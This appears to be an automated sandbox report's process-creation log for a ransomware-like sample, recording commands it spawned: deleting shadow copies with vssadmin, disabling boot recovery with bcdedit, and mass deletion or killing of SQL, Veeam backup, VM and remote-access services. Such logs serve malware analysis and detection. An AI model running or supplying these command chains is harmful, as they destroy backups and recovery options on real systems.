        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop SQLSERVERAGENTJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quietJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailuresJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled noJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLSERVERAGENT"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLBrowser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLTELEMETRY"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config MSSQLSERVER start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config "SQL Server (MSSQLSERVER)" start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop MSSQL$
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config MSSQL$ start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop SQLSERVERAGENT
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQL$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Tomcat7w.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLBrowser"
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM DDSoftPwsTomcat9.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM U8SmartClient.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop MSSQL$
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLTELEMETRY"
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "XT800Service_Personal"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop SQLSERVERAGENT
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Tomcat7w.exe /F
